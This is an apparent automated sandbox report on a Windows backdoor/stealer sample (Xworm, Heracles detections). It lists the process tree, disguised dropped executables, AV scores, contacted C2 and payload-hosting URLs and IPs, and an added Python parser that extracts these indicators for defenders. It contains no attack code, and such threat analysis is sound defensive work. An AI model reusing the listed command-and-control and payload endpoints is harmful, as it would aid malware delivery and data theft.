    - dropped: C:\Users\user\AppData\Local\Temp\msedge.exe (PE32); C:\Users\user\AppData\Local\Temp\dddd.exe (PE32+)
    - signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    - cmd.exe
      - msedge.exe
        - network: hope-asia.gl.at.ply.gg 147.185.221.18 (35710, 49723, 49752; SALSGIVERUS; United States); ip-api.com 208.95.112.1 (49706, 80; TUT-ASUS; United States)
        - dropped: C:\Users\user\AppData\...\System User.exe (PE32)
        - signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 5 other signatures
        - powershell.exe (signature: Loading BitLocker PowerShell Module)
          - conhost.exe
        - powershell.exe
          - conhost.exe
        - powershell.exe
          - conhost.exe
        - 2 other processes
          - conhost.exe
          - conhost.exe
      - conhost.exe
    - cmd.exe
      - dddd.exe
        - network: edge-term4-fra2.roblox.com 128.116.123.3 (443, 49708; ROBLOX-PRODUCTIONUS; United States); www.nodejs.org 104.20.22.46 (443, 49709; CLOUDFLARENETUS; United States); 2 other IPs or domains
        - dropped: \Device\ConDrv (ISO-8859)
        - signature: Machine Learning detection for dropped file
        - cmd.exe
          - ipconfig.exe
          - conhost.exe
        - conhost.exe
        - WerFault.exe
      - conhost.exe
    - cmd.exe (signatures: Uses cmd line tools excessively to alter registry or file data; Uses ipconfig to lookup or modify the Windows network settings)
      - conhost.exe
      - attrib.exe
    - cmd.exe
      - conhost.exe
      - attrib.exe
- System User.exe
- System User.exe
- 2 other processes

Source | Detection | Scanner | Label | Link
YgJ5inWPQO.exe | 26% | ReversingLabs | Win64.Backdoor.Jalapeno |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\msedge.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Roaming\System User.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Local\Temp\msedge.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\dddd.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\System User.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\_MEI4322\VCRUNTIME140.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI4322\_bz2.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI4322\_decimal.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI4322\_hashlib.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI4322\_lzma.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI4322\_socket.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI4322\libcrypto-3.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI4322\python313.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI4322\select.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI4322\unicodedata.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\dddd.exe | 63% | ReversingLabs | Win64.Trojan.Heracles |
C:\Users\user\AppData\Local\Temp\msedge.exe | 82% | ReversingLabs | Win32.Exploit.Xworm |
C:\Users\user\AppData\Roaming\System User.exe | 82% | ReversingLabs | Win32.Exploit.Xworm |

No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
nodejs.org | 104.20.22.46 | true | false | | high
getsolara.dev | 104.21.93.27 | true | false | | high
edge-term4-fra2.roblox.com | 128.116.123.3 | true | false | | high
www.nodejs.org | 104.20.22.46 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
hope-asia.gl.at.ply.gg | 147.185.221.18 | true | true | | unknown
clientsettings.roblox.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
hope-asia.gl.at.ply.gg | true | | unknown
https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi | false | | high
https://getsolara.dev/asset/discord.json | false | | high
https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live | false | | high
https://getsolara.dev/api/endpoint.json | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://127.0.0.1:6463dddd.exe, 0000000E.00000002.1731703513.000002623414E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://www.nodejs.orgdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://crosoft.com/pkiops/cerpowershell.exe, 0000001B.00000002.1758362165.0000013850D50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://schemas.micpowershell.exe, 0000001E.00000002.1938005634.00000254D6363000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.microsoft.copowershell.exe, 0000001B.00000002.1757718254.0000013850C10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/Licensepowershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A9124000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ncs.roblox.com/uploaddddd.exe, 0000000E.00000002.1731703513.00000262341C9000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234167000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.nodejs.orgdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dirdddd.exe, 0000000E.00000002.1731703513.00000262341DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zipdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#YgJ5inWPQO.exe, 00000002.00000002.1494569830.000001D8A93F3000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494594655.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491822955.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487788295.000001D8A93F4000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1493147338.000001D8A93F2000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataYgJ5inWPQO.exe, 00000002.00000003.1485952577.000001D8A9410000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1489435505.000001D8A9411000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494618160.000001D8A9411000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1488071941.000001D8A9411000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://aka.ms/vs/17/release/vc_redist.x64.exeYgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.DirOfdddd.exe, 0000000E.00000002.1731703513.0000026234122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://contoso.com/powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://nuget.org/nuget.exepowershell.exe, 00000014.00000002.1605494790.0000021DC04C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1733400343.0000013848664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1915994439.00000254CDE82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://crl.micft.cMicRosofpowershell.exe, 0000001E.00000002.1940467357.00000254D64E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://peps.python.org/pep-0205/YgJ5inWPQO.exe, 00000002.00000003.1473302298.000001D8A78EA000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1496226400.000001D8A97FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.microsoft.cYgJ5inWPQO.exe, 00000000.00000003.1464219398.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2195632946.0000020BF8D56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://127.0.0.1:6463/rpc?v=1dddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.000002623414E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsedge.exe, 0000000C.00000002.2742589628.000000000261B000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262340ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1580676392.0000021DB0451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.00000138385F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BDE24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1986459477.0000020B80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://edge-term4-fra2.roblox.comdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameYgJ5inWPQO.exe, 00000002.00000003.1485952577.000001D8A9410000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1488071941.000001D8A9411000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1488956192.000001D8A9415000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491431607.000001D8A9417000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A9124000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://nodejs.orgdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000014.00000002.1605494790.0000021DC04C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1733400343.0000013848664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1915994439.00000254CDE82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://discord.comdddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000022.00000002.1986459477.0000020B8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000014.00000002.1580676392.0000021DB0679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.000001383881A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BE039000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000022.00000002.1986459477.0000020B8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerYgJ5inWPQO.exe, 00000002.00000002.1494569830.000001D8A93F3000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494594655.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491822955.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487788295.000001D8A93F4000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1493147338.000001D8A93F2000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://crl.micpowershell.exe, 0000001E.00000002.1940467357.00000254D64E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://contoso.com/Iconpowershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://docs.python.org/3/howto/mro.html.YgJ5inWPQO.exe, 00000002.00000002.1494882785.000001D8A94E0000.00000004.00001000.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1475162914.000001D8A94AF000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1476006333.000001D8A94BB000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1475162914.000001D8A9448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_packageYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000022.00000002.1986459477.0000020B8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://james.newtonking.com/projects/jsondddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_moduleYgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A9124000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syYgJ5inWPQO.exe, 00000002.00000002.1494569830.000001D8A93F3000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494594655.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491822955.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487788295.000001D8A93F4000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1493147338.000001D8A93F2000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://getsolara.devdddd.exe, 0000000E.00000002.1731703513.0000026234105000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://discord.com;http://127.0.0.1:6463/rpc?v=11YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.jsonYgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exedddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://getsolara.devdddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262340FA000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262340ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.jsonYgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://127.0.0.1:64632dddd.exe, 0000000E.00000002.1731703513.000002623414E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000014.00000002.1580676392.0000021DB0679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.000001383881A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BE039000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.newtonsoft.com/jsonschemadddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.nuget.org/packages/Newtonsoft.Json.BsonYgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://crl.m~powershell.exe, 0000001E.00000002.1940467357.00000254D64E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://aka.ms/pscore68powershell.exe, 00000014.00000002.1580676392.0000021DB0451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.00000138385F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BDE24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1986459477.0000020B80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.python.org/psf/license/)YgJ5inWPQO.exe, 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyYgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
URL | Source (process, memory dump) | Malicious | Reputation
http://nodejs.org | dddd.exe, 0000000E.00000002.1731703513.0000026234332000.00000004.00000800.00020000.00000000.sdmp | false | high
http://clientsettings.roblox.com | dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp | false | high
https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi | dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp; dddd.exe, 0000000E.00000002.1731703513.0000026234167000.00000004.00000800.00020000.00000000.sdmp; dddd.exe, 0000000E.00000002.1731703513.00000262341C5000.00000004.00000800.00020000.00000000.sdmp | false | high
https://pastebin.com/raw/pjseRvyK | YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp; YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp; dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp; dddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmp | false | high
https://clientsettings.roblox.com | dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp | false | high
https://peps.python.org/pep-0263/ | YgJ5inWPQO.exe, 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmp | false | high
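The URL table above reached this page flattened: the URL, the first process name, the memory-dump identifiers and the true/false malicious flag are run together with no delimiter, which makes bulk IOC extraction from such reports error-prone. The Python below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling. It cuts those fields apart and reduces them to the hostnames and per-process URL sets an analyst would pivot on. It assumes the set of process names that appear in the report is known (here the two from this analysis, YgJ5inWPQO.exe and dddd.exe; extend KNOWN_PROCESSES for another report), because the process name is the only thing that separates the URL from the source list. The embedded input is the six rows of this table.

```python
"""Parse the flattened URL table of a Joe Sandbox report into IOC records."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple
from urllib.parse import urlparse

# Process names seen in this report. The flattened row has no delimiter between
# the URL and the first process name, so the parser needs this list to cut the
# two apart (assumption: extend it per report).
KNOWN_PROCESSES: Tuple[str, ...] = ("YgJ5inWPQO.exe", "dddd.exe")

# One row: "<url><process>, <dump>[, <process>, <dump>]...<true|false>"
ROW_RE = re.compile(r"^(?P<body>.+\.sdmp)(?P<flag>true|false)$")
# Memory dump id, eight dotted hex/decimal fields followed by ".sdmp"
DUMP_RE = re.compile(r"^[0-9A-F]+(?:\.[0-9A-F]+){7}\.sdmp$")

# The six rows of this report's URL table, copied as they appear on the page.
SAMPLE_ROWS = """
http://nodejs.orgdddd.exe, 0000000E.00000002.1731703513.0000026234332000.00000004.00000800.00020000.00000000.sdmpfalse
high
http://clientsettings.roblox.comdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
high
https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msidddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234167000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341C5000.00000004.00000800.00020000.00000000.sdmpfalse
high
https://pastebin.com/raw/pjseRvyKYgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmpfalse
high
https://clientsettings.roblox.comdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
high
https://peps.python.org/pep-0263/YgJ5inWPQO.exe, 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmpfalse
high
"""


@dataclass(frozen=True)
class UrlRow:
    url: str
    sources: Tuple[Tuple[str, str], ...]  # (process name, memory dump) pairs
    malicious: bool
    reputation: str


def split_url_and_sources(body: str, processes=KNOWN_PROCESSES):
    """Cut 'http://nodejs.orgdddd.exe, <dump>, dddd.exe, <dump>' into the URL and (process, dump) pairs."""
    tokens = body.split(", ")
    # Layout is head, dump, process, dump, ...: even count, every odd token a dump id.
    if len(tokens) % 2 or not all(DUMP_RE.match(t) for t in tokens[1::2]):
        raise ValueError(f"unexpected source layout: {body!r}")
    head = tokens[0]
    # Longest name first so a process name that is a suffix of another cannot win.
    for proc in sorted(processes, key=len, reverse=True):
        if head.endswith(proc) and len(head) > len(proc):
            url = head[: -len(proc)]
            break
    else:
        raise ValueError(f"no known process name fused to URL: {head!r}")
    sources = [(proc, tokens[1])]
    for p, d in zip(tokens[2::2], tokens[3::2]):
        if p not in processes:
            raise ValueError(f"unknown process in source list: {p!r}")
        sources.append((p, d))
    return url, tuple(sources)


def parse_url_table(text: str, processes=KNOWN_PROCESSES) -> List[UrlRow]:
    """Rows alternate: one fused data line, then the reputation line."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 2:
        raise ValueError("expected alternating row / reputation lines")
    rows: List[UrlRow] = []
    for row_line, reputation in zip(lines[0::2], lines[1::2]):
        m = ROW_RE.match(row_line)
        if not m:
            raise ValueError(f"not a URL table row: {row_line!r}")
        url, sources = split_url_and_sources(m["body"], processes)
        rows.append(UrlRow(url, sources, m["flag"] == "true", reputation))
    return rows


def hostnames(rows: List[UrlRow]) -> List[str]:
    """Deduplicated hostnames, the minimum a blocklist or DNS hunt needs."""
    return sorted({h for h in (urlparse(r.url).hostname for r in rows) if h})


def urls_by_process(rows: List[UrlRow]) -> Dict[str, Set[str]]:
    """Which process image had each URL in memory; separates loader from payload stage."""
    out: Dict[str, Set[str]] = {}
    for r in rows:
        for proc, _dump in r.sources:
            out.setdefault(proc, set()).add(r.url)
    return out


if __name__ == "__main__":
    for row in parse_url_table(SAMPLE_ROWS):
        seen_in = sorted({p for p, _ in row.sources})
        print(f"{row.url:60} malicious={row.malicious} seen_in={seen_in}")
```

Run as a script it prints one line per URL; the per-process view shows that the pastebin raw URL is present in the memory of both YgJ5inWPQO.exe and dddd.exe, while the nodejs.org and clientsettings.roblox.com URLs appear only in dddd.exe. Parsing from the right (dump ids first, then process names) rather than trying to guess where a URL ends keeps the parser correct for URLs that contain dots, slashes or file names.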
IP | Domain | Country | ASN | ASN Name | ASN Country | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-AS | US | false
128.116.123.3 | edge-term4-fra2.roblox.com | United States | 22697 | ROBLOX-PRODUCTION | US | false
104.21.93.27 | getsolara.dev | United States | 13335 | CLOUDFLARENET | US | false
104.20.22.46 | nodejs.org | United States | 13335 | CLOUDFLARENET | US | false
147.185.221.18 | hope-asia.gl.at.ply.gg | United States | 12087 | SALSGIVER | US | true
IP
127.0.0.1
